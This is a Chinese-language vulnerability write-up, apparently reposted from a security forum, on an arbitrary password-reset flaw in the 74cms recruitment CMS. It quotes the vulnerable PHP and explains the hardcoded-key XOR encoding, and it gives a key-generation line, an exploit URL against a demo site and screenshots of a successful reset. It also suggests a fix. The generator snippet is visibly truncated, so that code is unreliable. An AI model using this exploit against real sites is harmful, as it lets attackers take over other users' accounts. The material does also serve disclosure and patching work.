74cms任意用户密码修改

from [[90sec]][10310]

[10310]: https://forum.90sec.org/forum.php?mod=viewthread&tid=10310 "90sec"

这个任意用户密码修改比较垃圾,随便讲一下

```php
public function user_setpass(){
    if(IS_POST){
        $retrievePassword = session('retrievePassword');
        if($retrievePassword['token'] != I('post.token','','trim')) $this->error('非法参数!');
        $user['password']=I('post.password','','trim,badword');
        !$user['password'] && $this->error('请输入新密码!');
        if($user['password'] != I('post.password1','','trim,badword')) $this->error('两次输入密码不相同,请重新输入!');
        $passport = $this->_user_server();
        if(false === $uid = $passport->edit($retrievePassword['uid'],$user)) $this->error($passport->get_error());
        $tpl = 'user_setpass_sucess';
        session('retrievePassword',null);
    }else{
        parse_str(decrypt(I('get.key','','trim')),$data);
        !fieldRegex($data['e'],'email') && $this->error('找回密码失败,邮箱格式错误!','user_getpass');
        $end_time=$data['t']+24*3600;
        if($end_time<time()) $this->error('找回密码失败,链接过期!','user_getpass');
        $key_str=substr(md5($data['e'].$data['t']),8,16);
        if($key_str!=$data['k']) $this->error('找回密码失败,key错误!','user_getpass');
        if(!$uid = M('Members')->where(array('email'=>$data['e']))->getfield('uid')) $this->error('找回密码失败,帐号不存在!','user_getpass');
        $token=substr(md5(mt_rand(100000, 999999)), 8,16);
        session('retrievePassword',array('uid'=>$uid,'token'=>$token));
        $this->assign('token',$token);
    }
    $this->_config_seo(array('title'=>'找回密码 - '.C('qscms_site_name')));
    $this->display($tpl);
}
```

这里解密是用的decrypt函数,进去看一下:

```php
function decrypt($txt, $key = '_qscms') {
    $txt = passport_key(base64_decode($txt), $key);
    $tmp = '';
    for ($i = 0; $i < strlen($txt); $i++) {
        $tmp .= $txt[$i] ^ $txt[++$i];
    }
    return $tmp;
}

function passport_key($txt, $encrypt_key) {
    $encrypt_key = md5($encrypt_key);
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
```

默认密钥为_qscms,而且写死了,调用时没有传入。decrypt 只是用 md5('_qscms') 派生的固定密钥流做 XOR,而链接里用来校验的 k 也只是 md5(e.t),同样不含任何秘密,所以 key 里的每个字段都能离线算出来。所以,这里存在任意用户密码修改漏洞。从修复角度看,找回链接应使用服务端随机生成并保存的一次性 token(类似 POST 分支里的 session token),而不是由邮箱和时间戳确定性推导。

编写如下生成代码:

```php
$email, 'k'=>substr(md5($email.'9487070991'),8,16),'t'=>'9487070991'])));
```

获取key并替换到url中,可见这里直接可以修改用户example@xxx.com的密码了:

```
http://demo1.7yun.com//index.php?m=&c=members&a=user_setpass&key=$key
```

![](http://0day5.com/usr/uploads/2017/02/2444011266.png)

修改密码成功:

![](http://0day5.com/usr/uploads/2017/02/3708859033.png)
